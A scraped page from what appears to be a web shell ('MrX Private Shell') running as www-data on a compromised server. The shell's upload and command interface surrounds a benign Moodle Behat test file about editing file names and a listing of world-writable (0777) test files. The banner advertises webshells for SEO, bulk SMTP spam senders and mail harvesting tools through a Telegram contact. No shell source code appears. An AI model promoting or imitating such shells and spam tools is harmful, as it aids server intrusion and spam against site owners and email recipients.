__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@core @core_filepicker @_file_upload
Feature: Edit file feature
  In order to edit a file
  As a user
  I need to be able to select the file in filemanager and modify the file information

  Background:
    Given the following "courses" exist:
      | fullname | shortname | category |
      | Course 1 | C1 | 0 |
    And the following "blocks" exist:
      | blockname     | contextlevel | reference | pagetypepattern | defaultregion |
      | private_files | System       | 1         | my-index        | side-post     |
    And I log in as "admin"

  @javascript
  Scenario: Select file from "Files" filemanager using "icons" view and edit the name
    Given I follow "Manage private files"
    And I click on "Display folder with file icons" "link" in the ".filemanager" "css_element"
    And I upload "lib/tests/fixtures/empty.txt" file to "Files" filemanager
    And I should see "empty.txt" in the ".fp-content .fp-file" "css_element"
    And I click on "//div[contains(concat(' ', normalize-space(@class), ' '), ' fp-file ')]/descendant::a[normalize-space(.)='empty.txt']" "xpath_element"
    And I should see "Edit empty.txt"
    And I set the following fields to these values:
      | Name  | empty_edited.txt |
    When I click on "Update" "button"
    Then I should see "empty_edited.txt" in the ".fp-content .fp-file" "css_element"
    And I should not see "empty.txt" in the ".fp-content .fp-file" "css_element"

  @javascript
  Scenario: Select file from "Files" filemanager using "list" view and edit the name
    Given I follow "Manage private files"
    And I click on "Display folder with file details" "link" in the ".filemanager" "css_element"
    And I upload "lib/tests/fixtures/empty.txt" file to "Files" filemanager
    And I should see "empty.txt" in the ".fp-content .fp-filename" "css_element"
    And I click on "//span[contains(concat(' ', normalize-space(@class), ' '), ' fp-filename-icon ')]/descendant::a[normalize-space(.)='empty.txt']" "xpath_element"
    And I should see "Edit empty.txt"
    And I set the following fields to these values:
      | Name  | empty_edited.txt |
    When I click on "Update" "button"
    Then I should see "empty_edited.txt" in the ".fp-content .fp-filename" "css_element"
    And I should not see "empty.txt" in the ".fp-content .fp-filename" "css_element"

  @javascript
  Scenario: Select file from "Files" filemanager using "tree" view and edit the name
    Given I follow "Manage private files"
    And I click on "Display folder as file tree" "link" in the ".filemanager" "css_element"
    And I upload "lib/tests/fixtures/empty.txt" file to "Files" filemanager
    And I should see "empty.txt" in the ".fp-content .fp-hascontextmenu .fp-filename" "css_element"
    And I click on "//span[contains(concat(' ', normalize-space(@class), ' '), ' fp-filename-icon ')]/descendant::a[normalize-space(.)='empty.txt']" "xpath_element"
    And I should see "Edit empty.txt"
    And I set the following fields to these values:
      | Name  | empty_edited.txt |
    When I click on "Update" "button"
    Then I should see "empty_edited.txt" in the ".fp-content .fp-hascontextmenu .fp-filename" "css_element"
    And I should not see "empty.txt" in the ".fp-content .fp-hascontextmenu .fp-filename" "css_element"

Filemanager

Name Type Size Permission Actions
behat_filepicker.php File 19.92 KB 0777
cancel_add_file.feature File 1.65 KB 0777
create_folders.feature File 999 B 0777
create_shortcut.feature File 3.41 KB 0777
delete_files.feature File 6.86 KB 0777
edit_file.feature File 3.2 KB 0777
overwrite_file.feature File 2.54 KB 0777
select_file.feature File 3.13 KB 0777
upload_file_type.feature File 965 B 0777
zip_and_unzip.feature File 1.26 KB 0777
Filemanager